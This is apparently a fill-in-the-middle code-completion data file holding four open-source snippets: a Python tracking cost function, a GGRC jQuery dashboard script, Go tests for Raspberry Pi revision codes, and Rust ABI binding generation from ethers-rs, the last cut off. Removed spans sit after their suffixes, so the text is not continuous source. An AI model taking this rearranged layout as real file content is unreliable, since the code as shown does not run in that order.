def iou_distance(atracks, btracks):
"""
Compute cost based on IoU
:type atracks: list[STrack]
:type btracks: list[STrack]
:rtype cost_matrix np.ndarray
"""
if (len(atracks)>0 and isinstance(atracks[0], np.ndarray)) or (len(btracks) > 0 and isinstance(btracks[0], np.ndarray)):
atlbrs = atracks
btlbrs = btracks
else:
atlbrs = [track.tlbr for track in atracks]
btlbrs = [track.tlbr for track in btracks]
_ious = ious(atlbrs, btlbrs)
cost_matrix = 1 - _ious
return cost_matrix
def embedding_distance(tracks, detections, metric='cosine'):
"""
:param tracks: list[STrack]
:param detections: list[BaseTrack]
:param metric:
:return: cost_matrix np.ndarray
"""
cost_matrix = np.zeros((len(tracks), len(detections)), dtype=np.float)
if cost_matrix.size == 0:
return cost_matrix
det_features = np.asarray([track.curr_feat for track in detections], dtype=np.float)
track_features = np.asarray([track.smooth_feat for track in tracks], dtype=np.float)
cost_matrix = np.maximum(0.0, cdist(track_features, det_features)) # Nomalized features
return cost_matrix
def | (kf, cost_matrix, tracks, detections, only_position=False, lambda_=0.98):
if cost_matrix.size == 0:
return cost_matrix
gating_dim = 2 if only_position else 4
gating_threshold = kalman_filter.chi2inv95[gating_dim]
measurements = np.asarray([det.to_xyah() for det in detections])
for row, track in enumerate(tracks):
gating_distance = kf.gating_distance(
track.mean, track.covariance, measurements, only_position, metric='maha')
cost_matrix[row, gating_distance > gating_threshold] = np.inf
cost_matrix[row] = lambda_ * cost_matrix[row] + (1-lambda_)* gating_distance
return cost_matrix
| fuse_motion |
dashboard.js | /*!
Copyright (C) 2016 Google Inc.
Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
*/
// Initialize delegated event handlers
jQuery(function ($) {
window.natural_comparator = function (a, b) {
var i;
a = a.slug.toString();
b = b.slug.toString();
if (a === b) {
return 0;
}
a = a.replace(/(?=\D\d)(.)|(?=\d\D)(.)/g, '$1$2|').split('|');
b = b.replace(/(?=\D\d)(.)|(?=\d\D)(.)/g, '$1$2|').split('|');
for (i = 0; i < Math.max(a.length, b.length); i++) {
if (Number(a[i]) === Number(a[i]) && Number(b[i]) === Number(b[i])) {
if (Number(a[i]) < Number(b[i])) {
return -1;
}
if (Number(b[i]) < Number(a[i])) {
return 1;
}
} else {
if (a[i] < b[i]) {
return -1;
}
if (b[i] < a[i]) {
return 1;
}
}
}
return 0;
};
// Turn the arrow when tree node content is shown
$('body').on('click', '[data-toggle="collapse"]', function (e) {
var $this = $(this);
var $expander_container = $this.closest(':has(.expander, .enddot)');
var $expander = $expander_container.find('.expander').eq(0);
var $target = $($this.data('target'));
setTimeout(function () {
if ($target.hasClass('in')) {
$expander.addClass('in');
} else {
$expander.removeClass('in');
}
}, 100);
});
// After the modal template has loaded from the server, but before the
// data has loaded to populate into the body, show a spinner
$('body').on('loaded', '.modal.modal-slim, .modal.modal-wide', function (e) {
var spin = function () {
$(this).html(
$(new Spinner().spin().el)
.css({
width: '100px', height: '100px',
left: '50%', top: '50%',
zIndex: calculate_spinner_z_index
})
).one('loaded', function () {
$(this).find('.source').each(spin);
});
};
$(e.target).find('.modal-body .source').each(spin);
});
$('body').on('click', '[data-toggle="list-remove"]', function (e) {
e.preventDefault();
$(this).closest('li').remove();
});
$('body').on('click', '[data-toggle="list-select"]', function (e) {
var $this;
var $li;
var target;
var data;
e.preventDefault();
$this = $(this);
$li = $this.closest('li');
target = $li.closest('ul').data('list-target');
if (target) {
data = $.extend({}, $this.data('context') || {}, $this.data());
$(target).tmpl_mergeitems([data]);
}
});
});
// This is only used by import to redirect on successful import
// - this cannot use other response headers because it is proxied through
// an iframe to achieve AJAX file upload (using remoteipart)
jQuery(function ($) {
var submit_import = 'form.import input[type=submit]';
var file_select_elem = 'form.import input[type=file]';
function onSubmitClick(ev) {
if (typeof ev !== 'object') {
// sometimes browser triggers submit, not the user -> ignore
return;
}
if ($(this).hasClass('disabled') || $(file_select_elem).val() === '') {
if (ev) {
ev.preventDefault();
}
}
$(this).addClass('disabled');
}
function checkStatus(result, type, $btn) {
CMS.Models.BackgroundTask.findOne({id: result.id}, function (task) {
var msg = ($btn && $btn.val() == 'Upload and Review') ? $btn.val() : type;
var $container;
var jsonResult;
var headers;
var i;
if (task.status == 'Pending' || task.status == 'Running') {
$('body').trigger(
'ajax:flash',
{progress: msg + ' ' + task.status.toLowerCase() + '...'}
);
// Task has not finished yet, check again in a while:
setTimeout(function () {
checkStatus(result, type, $btn);
}, 3000);
} else if (task.status == 'Success') {
$container = $('#results-container');
if ($btn) {
$btn.removeClass('disabled');
}
// Check if redirect:
try {
jsonResult = $.parseJSON($(task.result.content).text());
if ('location' in jsonResult) {
GGRC.navigate(jsonResult.location);
return;
}
} catch (e) {}
// Check if file download (export):
if ('headers' in task.result) {
headers = task.result.headers;
for (i = 0; i < headers.length; i++) {
if (headers[i][0] == 'Content-Type' && headers[i][1] == 'text/csv') {
window.location.assign('/background_task/' + task.id);
}
}
}
$container.html(task.result.content);
$container.find('input[type=submit]').click(onSubmitClick);
if (msg === 'Upload and Review') {
// Don't display "Upload and Review successful." message;
// But kill progress message.
$('body').trigger('ajax:flash', {});
return;
}
$('body').trigger(
'ajax:flash',
{success: msg + ' successful.'}
);
} else if (task.status == 'Failure') {
if ($btn) {
$btn.removeClass('disabled');
}
$('body').trigger(
'ajax:flash',
{error: msg + ' failed.'}
);
}
});
}
$(submit_import).click(onSubmitClick); | // handler to initialize import upload button as disabled
$(submit_import).ready(function () {
$(submit_import).addClass('disabled');
});
$('body').on('ajax:success', 'form.import', function (e, data, status, xhr) {
var $btn = $('form.import .btn.disabled').first();
var result;
if (xhr.getResponseHeader('Content-Type') == 'application/json') {
result = $.parseJSON(data);
if ('location' in result) {
// Redirect
GGRC.navigate(result.location);
}
// Check if task has completed:
setTimeout(function () {
checkStatus(result, 'Import', $btn);
}, 500);
} else if ($btn) {
$btn.removeClass('disabled');
}
});
// change button to disabled when no file selected, and vice versa
$(file_select_elem).change(function (ev) {
if (this.value === '') {
$(submit_import).each(onSubmitClick);
} else {
$(submit_import).removeClass('disabled');
}
});
jQuery(function ($) {
$('body').on('ajax:success', 'form[data-remote][data-update-target]', function (e, data, status, xhr) {
var $container;
if (xhr.getResponseHeader('Content-Type') == 'text/html') {
$container = $($(this).data('update-target'));
$container.html(data);
$container.find('input[type=submit]').click(onSubmitClick);
}
});
});
});
jQuery(function ($) {
function refresh_page() {
setTimeout(can.proxy(window.location.reload, window.location), 10);
}
$('body').on('ajax:complete', '[data-ajax-complete="refresh"]', refresh_page);
});
jQuery(function ($) {
$('body').on('ajax:success', '#helpedit form', function (e, data, status, xhr) {
var $modal = $(this).closest('.modal');
$modal.find('.modal-header h1').html(data.help.title);
$modal.find('.modal-body .help-content').html(data.help.content);
$modal.find('.modal-body #helpedit').collapse('hide');
});
});
jQuery(function ($) {
// Used in object_list sidebars (References, People, Categories)
$('body').on('modal:success', '.js-list-container-title a', function (e, data) {
var $this = $(this);
var $title = $this.closest('.js-list-container-title');
var $span = $title.find('span');
var $expander = $title.find('.expander').eq(0);
$span.text('(' + (data.length || 0) + ')');
if (data.length > 0) {
$span.removeClass('no-object');
} else {
$span.addClass('no-object');
}
if (!$expander.hasClass('in')) {
$expander.click();
}
});
});
jQuery(function ($) {
function checkActive(notification_configs) {
var inputs = $('.notify-wrap').find('input');
var active_notifications = $.map(notification_configs, function (a) {
if (a.enable_flag) {
return a.notif_type;
}
});
$.map(inputs, function (input) {
// Handle the default case, in case notification objects are not set:
if (notification_configs.length === 0) {
input.checked = input.value === 'Email_Digest';
} else {
input.checked = active_notifications.indexOf(input.value) > -1;
}
});
}
function updateNotifications() {
CMS.Models.NotificationConfig.findActive().then(checkActive);
$('body').off('click', '.user-dropdown > .dropdown-toggle', updateNotifications);
}
$('body').on('click', '.user-dropdown > .dropdown-toggle', updateNotifications);
// Don't close the dropdown if clicked on checkbox
$('body').on('click', '.notify-wrap', function (ev) {
ev.stopPropagation();
});
$('body').on('click', 'input[name=notifications]', function (ev, el) {
var li = $(ev.target).closest('.notify-wrap');
var inputs = li.find('input');
var active = [];
var email_now = li.find('input[value="Email_Now"]');
var email_now_label = email_now.closest('label');
var email_digest = li.find('input[value="Email_Digest"]');
if (email_digest[0].checked) {
email_now_label.removeClass('disabled');
email_now.prop('disabled', false);
} else if (!email_digest[0].checked) {// uncheck email_now
email_now.prop('checked', false);
email_now_label.addClass('disabled');
}
inputs.prop('disabled', true);
active = $.map(inputs, function (input) {
if (input.checked) {
return input.value;
}
});
CMS.Models.NotificationConfig.setActive(active).always(function (response) {
email_digest.prop('disabled', false);
if (email_digest[0].checked) {
email_now.prop('disabled', false);
}
});
});
$('body').on('click', '.clear-display-settings', function (e) {
CMS.Models.DisplayPrefs.findAll().done(function (data) {
var destroys = [];
can.each(data, function (d) {
d.unbind('change'); // forget about listening to changes. we're going to refresh the page
destroys.push(d.resetPagePrefs());
});
$.when.apply($, destroys).done(function () {
GGRC.navigate();
});
});
})
.on('click', '.set-display-settings-default', function (e) {
var page_token = getPageToken();
CMS.Models.DisplayPrefs.findAll().done(function (data) {
var destroys = [];
can.each(data, function (d) {
d.unbind('change'); // forget about listening to changes. we're going to refresh the page
destroys.push(d.setPageAsDefault(page_token));
});
$.when.apply($, destroys).done(function () {
$('body').trigger(
'ajax:flash',
{success: 'Saved page layout as default for ' + (page_token === 'dashboard' ? 'dashboard' : page_token)}
);
});
});
});
});
// Make all external links open in new window.
jQuery(function ($) {
$('body').on('click', 'a[href]:not([target])', function (e) {
if (!e.isDefaultPrevented()) {
if (/^http/.test(this.protocol) && this.hostname !== window.location.hostname) {
e.preventDefault();
window.open(this.href);
}
}
});
});
function resize_areas(event, target_info_pin_height) {
var $window = $(window);
var $bar = $('.bar-v');
var $footer = $('.footer');
var $header = $('.header-content');
var $innerNav = $('.inner-nav');
var $lhnType = $('.lhn-type');
var $lhsHolder = $('.lhs-holder');
var $objectArea = $('.object-area');
var $pin = $('.pin-content');
var $topNav = $('.top-inner-nav');
var winHeight = $window.height();
var winWidth = $window.width();
var lhsHeight = winHeight - 180; // new ui
var footerMargin = lhsHeight + 130; // new UI
var internavHeight = object_area_height();
var internavWidth = $innerNav.width() || 0; // || 0 for pages without inner-nav
var lhsWidth = $lhsHolder.width();
var objectWidth = winWidth;
$lhnType.css('width', lhsWidth);
$lhsHolder.css('height', lhsHeight);
$bar.css('height', lhsHeight);
$footer.css('margin-top', footerMargin);
$innerNav.css('height', internavHeight);
$objectArea
.css('margin-left', internavWidth)
.css('height', internavHeight)
.css('width', objectWidth);
function object_area_height() {
var height = winHeight - not_main_elements_height();
var nav_pos = $topNav.css('top') ?
Number($topNav.css('top').replace('px', '')) :
0;
if (nav_pos < $header.height()) {
height -= $topNav.height();
}
return height;
}
function not_main_elements_height() {
var margins = [$objectArea.css('margin-top'), $objectArea.css('margin-bottom'),
$objectArea.css('padding-top'), $objectArea.css('padding-bottom')]
.map(function (margin) {
if (!margin) {
margin = '0';
}
return Number(margin.replace('px', ''));
})
.reduce(function (m, h) {
return m + h;
}, 0);
var pin_height = $.isNumeric(target_info_pin_height) ?
target_info_pin_height :
$pin.height();
// the 5 gives user peace of mind they've reached bottom
var UIHeight = [$topNav.height(), $header.height(),
$footer.height(),
margins, pin_height, 5]
.reduce(function (m, h) {
return m + h;
}, 0);
return UIHeight;
}
}
jQuery(function ($) {
// Footer expander animation helper
function expander(toggle, direction) {
var $this = $(toggle);
var $expander = $this.closest('div').find('.section-expander');
var out = direction === 'out';
var height = $expander.outerHeight();
var width = $expander.outerWidth();
var start = out ? 0 : width;
var end = out ? width : 0;
var duration = 500;
var clip;
if (out) {
$this.filter(':not(.section-sticky)').fadeOut(200);
}
// Check for intermediate animation
// Update the starting point and duration as appropriate
if ($expander.is(':animated')) {
$expander.stop();
clip = $expander.css('clip').match(/^rect\(([0-9.-]+)px,?\s+([0-9.-]+)px,?\s+([0-9.-]+)px,?\s+([0-9.-]+)px\)$/);
if (clip) {
// Start or end is always zero, so we can use some shortcuts
start = parseFloat(clip[2]);
duration = ~~((end ? end - start : start) / width * duration);
}
}
// Process animation
$expander.css({
display: 'inline-block',
marginRight: end + 'px',
clip: 'rect(0px, ' + start + 'px, ' + height + 'px, 0px)',
left: $this.is('.section-sticky') ? $this.outerWidth() : 0
}).animate({
marginRight: start + 'px'
}, {
duration: duration,
easing: 'easeInOutExpo',
step: function (now, fx) {
$(this).css('clip', 'rect(0px, ' + (width - now + (out ? start : end)) + 'px, ' + height + 'px, 0px)');
},
complete: function () {
if (!out) {
$this.filter(':not(.section-sticky)').fadeIn();
$(this).hide();
}
$(this).css({
marginRight: '0px',
clip: 'auto'
});
}
});
// Queue the reverse on mouseout
if (out) {
$this.closest('li').one('mouseleave', function () {
expander($this, 'in');
});
}
}
// Footer expander animations (verify that an expander exists)
$('body').on('mouseenter', '.section-add:has(+ .section-expander), .section-expander:visible:animated', function (e) {
var $this = $(this);
expander($this.hasClass('section-add') ? $this : $this.prev('.section-add'), 'out');
});
$('body').on('click', '.show-long', function (e) {
var $this = $(this);
var $descField = $this.closest('.span12').find('.tree-description');
$this.hide();
$descField.removeClass('short');
});
// show/hide audit lead and firm
$('body').on('mouseover', '.ui-autocomplete li a', function (e) {
var $this = $(this);
$this.addClass('active');
$this.closest('li').addClass('active');
});
$('body').on('mouseleave', '.ui-autocomplete li a', function (e) {
var $this = $(this);
$this.removeClass('active');
$this.closest('li').removeClass('active');
});
});
jQuery(window).on('load', resize_areas);
jQuery(window).on('resize', resize_areas); | |
rpi_test.go | // Copyright 2019 The Periph Authors. All rights reserved.
// Use of this source code is governed under the Apache License, Version 2.0
// that can be found in the LICENSE file.
package rpi
import (
"reflect"
"testing"
)
func TestParseRevision(t *testing.T) {
data := []struct {
v uint32
r revisionCode
}{
// https://www.raspberrypi.org/documentation/hardware/raspberrypi/revision-codes/README.md
// Old style
{0x2, newFormat | memory256MB | egoman | bcm2835 | board1B},
{0x3, newFormat | memory256MB | egoman | bcm2835 | board1B},
{0x4, newFormat | memory256MB | sonyUK | bcm2835 | board1B | 2},
{0x5, newFormat | memory256MB | bcm2835 | board1B | 2},
{0x6, newFormat | memory256MB | egoman | bcm2835 | board1B | 2},
{0x7, newFormat | memory256MB | egoman | bcm2835 | board1A | 2},
{0x8, newFormat | memory256MB | sonyUK | bcm2835 | board1A | 2},
{0x9, newFormat | memory256MB | bcm2835 | board1A | 2},
{0xd, newFormat | memory512MB | egoman | bcm2835 | board1B | 2},
{0xe, newFormat | memory512MB | sonyUK | bcm2835 | board1B | 2},
{0xf, newFormat | memory512MB | egoman | bcm2835 | board1B | 2},
{0x10, newFormat | memory512MB | sonyUK | bcm2835 | board1BPlus | 2},
{0x11, newFormat | memory512MB | sonyUK | bcm2835 | boardCM1},
{0x12, newFormat | memory256MB | sonyUK | bcm2835 | board1APlus | 1},
{0x13, newFormat | memory512MB | embest | bcm2835 | board1BPlus | 2},
{0x14, newFormat | memory512MB | embest | bcm2835 | boardCM1},
{0x15, newFormat | memory256MB | embest | bcm2835 | board1APlus | 1},
// Test warranty bit
{0x1000015, warrantyVoid | newFormat | memory256MB | embest | bcm2835 | board1APlus | 1},
// New style
{0x900021, newFormat | memory512MB | sonyUK | bcm2835 | board1APlus | 1},
{0x900032, newFormat | memory512MB | sonyUK | bcm2835 | board1BPlus | 2},
{0x900092, newFormat | memory512MB | sonyUK | bcm2835 | boardZero | 2},
{0x900093, newFormat | memory512MB | sonyUK | bcm2835 | boardZero | 3},
{0x9000c1, newFormat | memory512MB | sonyUK | bcm2835 | boardZeroW | 1},
{0x9020e0, newFormat | memory512MB | sonyUK | bcm2837 | board3APlus},
{0x920092, newFormat | memory512MB | embest | bcm2835 | boardZero | 2},
{0x920093, newFormat | memory512MB | embest | bcm2835 | boardZero | 3},
{0x900061, newFormat | memory512MB | sonyUK | bcm2835 | boardCM1 | 1},
{0xa01040, newFormat | memory1GB | sonyUK | bcm2836 | board2B},
{0xa01041, newFormat | memory1GB | sonyUK | bcm2836 | board2B | 1},
{0xa02082, newFormat | memory1GB | sonyUK | bcm2837 | board3B | 2},
{0xa020a0, newFormat | memory1GB | sonyUK | bcm2837 | boardCM3},
{0xa020d3, newFormat | memory1GB | sonyUK | bcm2837 | board3BPlus | 3},
{0xa21041, newFormat | memory1GB | embest | bcm2836 | board2B | 1},
{0xa22042, newFormat | memory1GB | embest | bcm2837 | board2B | 2},
{0xa22082, newFormat | memory1GB | embest | bcm2837 | board3B | 2},
{0xa220a0, newFormat | memory1GB | embest | bcm2837 | boardCM3},
{0xa32082, newFormat | memory1GB | sonyJapan | bcm2837 | board3B | 2},
{0xa52082, newFormat | memory1GB | stadium | bcm2837 | board3B | 2},
{0xa22083, newFormat | memory1GB | embest | bcm2837 | board3B | 3},
{0xa02100, newFormat | memory1GB | sonyUK | bcm2837 | boardCM3Plus},
{0xa03111, newFormat | memory1GB | sonyUK | bcm2711 | board4B | 1},
{0xb03111, newFormat | memory2GB | sonyUK | bcm2711 | board4B | 1},
{0xc03111, newFormat | memory4GB | sonyUK | bcm2711 | board4B | 1},
{0xb03112, newFormat | memory2GB | sonyUK | bcm2711 | board4B | 2},
{0xc03112, newFormat | memory4GB | sonyUK | bcm2711 | board4B | 2},
{0xb03114, newFormat | memory2GB | sonyUK | bcm2711 | board4B | 4},
{0xc03114, newFormat | memory4GB | sonyUK | bcm2711 | board4B | 4},
{0xd03114, newFormat | memory8GB | sonyUK | bcm2711 | board4B | 4},
{0xc03130, newFormat | memory4GB | sonyUK | bcm2711 | board400},
}
for i, line := range data {
r, err := parseRevision(line.v)
if err != nil {
t.Fatalf("#%d: unexpected failure: %v", i, err)
}
if line.r != r {
t.Fatalf("#%d: unexpected: %#x != %#x", i, line.r, r)
}
}
}
func TestParseRevisionErr(t *testing.T) |
func TestFeaturesInit(t *testing.T) {
data := []struct {
v uint32
f features
}{
{0x2, features{hdrP1P26: true, hdrAudio: true}}, // board1B
{0x3, features{hdrP1P26: true, hdrAudio: true}}, // board1B
{0x4, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0x5, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0x6, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0x7, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1A
{0x8, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1A
{0x9, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1A
{0xd, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0xe, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0xf, features{hdrP1P26: true, hdrP5: true, hdrAudio: true, hdrHDMI: true}}, // board1B
{0x10, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1BPlus
{0x11, features{}}, // boardCM1
{0x12, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1APlus
{0x13, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1BPlus
{0x14, features{}}, // boardCM1
{0x15, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1APlus
{0x900092, features{hdrP1P40: true, hdrHDMI: true}}, // boardZero
{0x900093, features{hdrP1P40: true, hdrHDMI: true}}, // boardZero
{0x9000c1, features{hdrP1P40: true, hdrHDMI: true}}, // boardZeroW
{0x920093, features{hdrP1P40: true, hdrHDMI: true}}, // boardZero
{0xa01040, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board2B
{0xa01041, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board2B
{0xa02082, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0xa020a0, features{hdrSODIMM: true}}, // boardCM3
{0xa020d3, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3BPlus
{0xa21041, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board2B
{0xa22042, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board2B
{0xa22082, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0xa32082, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0x900021, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1APlus
{0x900032, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1BPlus
{0x9020e0, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3APlus
{0x920092, features{hdrP1P40: true, hdrHDMI: true}}, // boardZero
{0x900061, features{}}, // boardCM1
{0xa220a0, features{hdrSODIMM: true}}, // boardCM3
{0xa52082, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0xa22083, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0xa02100, features{hdrSODIMM: true}}, // boardCM3Plus
{0xa03111, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board4B
{0xb03111, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board4B
{0xc03111, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board4B
{0xc03130, features{hdrP1P40: true, hdrHDMI: true}}, // board400
}
for i, line := range data {
f := features{}
if err := f.init(line.v); err != nil {
t.Fatalf("#%d: unexpected failure for %#x: %v", i, line.v, err)
}
if line.f != f {
t.Fatalf("#%d: unexpected for %#x:\nexpected: %#v\nactual: %#v", i, line.v, line.f, f)
}
}
}
func TestFeaturesInitErr(t *testing.T) {
data := []uint32{
0x0,
0x1,
0x16,
}
for i, v := range data {
f := features{}
if err := f.init(v); err == nil {
t.Fatalf("#%d: unexpected success for %#x", i, v)
}
}
}
func TestDriver(t *testing.T) {
if v := drv.String(); v != "rpi" {
t.Fatal(v)
}
if v := drv.Prerequisites(); v != nil {
t.Fatal(v)
}
if v := drv.After(); reflect.DeepEqual(v, []string{"bcm2835-gpio"}) {
t.Fatal(v)
}
}
| {
data := []uint32{0, 1, 0xa, 0xb, 0xc, 0x16}
for i, v := range data {
if _, err := parseRevision(v); err == nil {
t.Fatalf("#%d: unexpected success for %#x", i, v)
}
}
} |
methods.rs | use std::collections::BTreeMap;
use anyhow::{Context as _, Result};
use inflector::Inflector;
use proc_macro2::{Literal, TokenStream};
use quote::quote;
use syn::Ident;
use ethers_core::abi::ParamType;
use ethers_core::{
abi::{Function, FunctionExt, Param},
types::Selector,
};
use super::{types, util, Context};
/// Expands a context into a method struct containing all the generated bindings
/// to the Solidity contract methods.
impl Context {
/// Expands all method implementations
pub(crate) fn methods_and_call_structs(&self) -> Result<(TokenStream, TokenStream)> {
let aliases = self.get_method_aliases()?;
let sorted_functions: BTreeMap<_, _> = self.abi.functions.iter().collect();
let functions = sorted_functions
.values()
.map(std::ops::Deref::deref)
.flatten()
.map(|function| {
let signature = function.abi_signature();
self.expand_function(function, aliases.get(&signature).cloned())
.with_context(|| format!("error expanding function '{}'", signature))
})
.collect::<Result<Vec<_>>>()?;
let function_impls = quote! { #( #functions )* };
let call_structs = self.expand_call_structs(aliases)?;
Ok((function_impls, call_structs))
}
/// Expands to the corresponding struct type based on the inputs of the given function
fn expand_call_struct(
&self,
function: &Function,
alias: Option<&Ident>,
) -> Result<TokenStream> {
let call_name = expand_call_struct_name(function, alias);
let fields = self.expand_input_pairs(function)?;
// expand as a tuple if all fields are anonymous
let all_anonymous_fields = function.inputs.iter().all(|input| input.name.is_empty());
let call_type_definition = if all_anonymous_fields {
// expand to a tuple struct
expand_data_tuple(&call_name, &fields)
} else {
// expand to a struct
expand_data_struct(&call_name, &fields)
};
let function_name = &function.name;
let abi_signature = function.abi_signature();
let doc = format!(
"Container type for all input parameters for the `{}`function with signature `{}` and selector `{:?}`",
function.name,
abi_signature,
function.selector()
);
let abi_signature_doc = util::expand_doc(&doc);
let ethers_contract = util::ethers_contract_crate();
// use the same derives as for events
let derives = util::expand_derives(&self.event_derives);
Ok(quote! {
#abi_signature_doc
#[derive(Clone, Debug, Default, Eq, PartialEq, #ethers_contract::EthCall, #ethers_contract::EthDisplay, #derives)]
#[ethcall( name = #function_name, abi = #abi_signature )]
pub #call_type_definition
})
}
/// Expands all structs
fn expand_call_structs(&self, aliases: BTreeMap<String, Ident>) -> Result<TokenStream> {
let mut struct_defs = Vec::new();
let mut struct_names = Vec::new();
let mut variant_names = Vec::new();
for function in self.abi.functions.values().flatten() {
let signature = function.abi_signature();
let alias = aliases.get(&signature);
struct_defs.push(self.expand_call_struct(function, alias)?);
struct_names.push(expand_call_struct_name(function, alias));
variant_names.push(expand_call_struct_variant_name(function, alias));
}
let struct_def_tokens = quote! {
#(#struct_defs)*
};
if struct_defs.len() <= 1 {
// no need for an enum
return Ok(struct_def_tokens);
}
let ethers_core = util::ethers_core_crate();
let ethers_contract = util::ethers_contract_crate();
let enum_name = self.expand_calls_enum_name();
Ok(quote! {
#struct_def_tokens
#[derive(Debug, Clone, PartialEq, Eq, #ethers_contract::EthAbiType)]
pub enum #enum_name {
#(#variant_names(#struct_names)),*
}
impl #ethers_contract::AbiDecode for #enum_name {
fn decode(data: impl AsRef<[u8]>) -> Result<Self, #ethers_contract::AbiError> {
#(
if let Ok(decoded) = <#struct_names as #ethers_contract::AbiDecode>::decode(data.as_ref()) {
return Ok(#enum_name::#variant_names(decoded))
}
)*
Err(#ethers_core::abi::Error::InvalidData.into())
}
}
impl #ethers_contract::AbiEncode for #enum_name {
fn encode(self) -> Result<#ethers_core::types::Bytes, #ethers_contract::AbiError> {
match self {
#(
#enum_name::#variant_names(element) => element.encode()
),*
}
}
}
impl ::std::fmt::Display for #enum_name {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
match self {
#(
#enum_name::#variant_names(element) => element.fmt(f)
),*
}
}
}
#(
impl ::std::convert::From<#struct_names> for #enum_name {
fn from(var: #struct_names) -> Self {
#enum_name::#variant_names(var)
}
}
)*
})
}
/// The name ident of the calls enum
fn expand_calls_enum_name(&self) -> Ident {
util::ident(&format!("{}Calls", self.contract_name.to_string()))
}
/// Expands to the `name : type` pairs of the function's inputs
fn expand_input_pairs(&self, fun: &Function) -> Result<Vec<(TokenStream, TokenStream)>> {
let mut args = Vec::with_capacity(fun.inputs.len());
for (idx, param) in fun.inputs.iter().enumerate() {
let name = util::expand_input_name(idx, ¶m.name);
let ty = self.expand_input_param(fun, ¶m.name, ¶m.kind)?;
args.push((name, ty));
}
Ok(args)
}
/// Expands the arguments for the call that eventually calls the contract
fn expand_contract_call_args(&self, fun: &Function) -> Result<TokenStream> {
let mut call_args = Vec::with_capacity(fun.inputs.len());
for (idx, param) in fun.inputs.iter().enumerate() {
let name = util::expand_input_name(idx, ¶m.name);
let call_arg = match param.kind {
// this is awkward edge case where the function inputs are a single struct
// we need to force this argument into a tuple so it gets expanded to `((#name,))`
// this is currently necessary because internally `flatten_tokens` is called which
// removes the outermost `tuple` level and since `((#name))` is not
// a rust tuple it doesn't get wrapped into another tuple that will be peeled off by
// `flatten_tokens`
ParamType::Tuple(_) if fun.inputs.len() == 1 => {
// make sure the tuple gets converted to `Token::Tuple`
quote! {(#name,)}
}
_ => name,
};
call_args.push(call_arg);
}
let call_args = match call_args.len() {
0 => quote! { () },
1 => quote! { #( #call_args )* },
_ => quote! { ( #(#call_args, )* ) },
};
Ok(call_args)
}
fn expand_input_param(
&self,
fun: &Function,
param: &str,
kind: &ParamType,
) -> Result<TokenStream> {
match kind {
ParamType::Array(ty) => {
let ty = self.expand_input_param(fun, param, ty)?;
Ok(quote! {
::std::vec::Vec<#ty>
})
}
ParamType::FixedArray(ty, size) => {
let ty = self.expand_input_param(fun, param, ty)?;
let size = *size;
Ok(quote! {[#ty; #size]})
}
ParamType::Tuple(_) => {
let ty = if let Some(rust_struct_name) = self
.internal_structs
.get_function_input_struct_type(&fun.name, param)
{
let ident = util::ident(rust_struct_name);
quote! {#ident}
} else {
types::expand(kind)?
};
Ok(ty)
}
_ => types::expand(kind),
}
}
/// Expands a single function with the given alias
fn expand_function(&self, function: &Function, alias: Option<Ident>) -> Result<TokenStream> {
let name = alias.unwrap_or_else(|| util::safe_ident(&function.name.to_snake_case()));
let selector = expand_selector(function.selector());
// TODO use structs
let outputs = expand_fn_outputs(&function.outputs)?;
let ethers_contract = util::ethers_contract_crate();
let result = quote! { #ethers_contract::builders::ContractCall<M, #outputs> };
let contract_args = self.expand_contract_call_args(function)?;
let function_params = self
.expand_input_pairs(function)?
.into_iter()
.map(|(name, ty)| quote! { #name: #ty });
let function_params = quote! { #( , #function_params )* };
let doc = util::expand_doc(&format!(
"Calls the contract's `{}` (0x{}) function",
function.name,
hex::encode(function.selector())
));
Ok(quote! {
#doc
pub fn #name(&self #function_params) -> #result {
self.0.method_hash(#selector, #contract_args)
.expect("method not found (this should never happen)")
}
})
}
/// Returns the method aliases, either configured by the user or determined
/// based on overloaded functions.
///
/// In case of overloaded functions we would follow rust's general
/// convention of suffixing the function name with _with
// The first function or the function with the least amount of arguments should
// be named as in the ABI, the following functions suffixed with _with_ +
// additional_params[0].name + (_and_(additional_params[1+i].name))*
fn get_method_aliases(&self) -> Result<BTreeMap<String, Ident>> {
let mut aliases = self.method_aliases.clone();
// find all duplicates, where no aliases where provided
for functions in self.abi.functions.values() {
if functions
.iter()
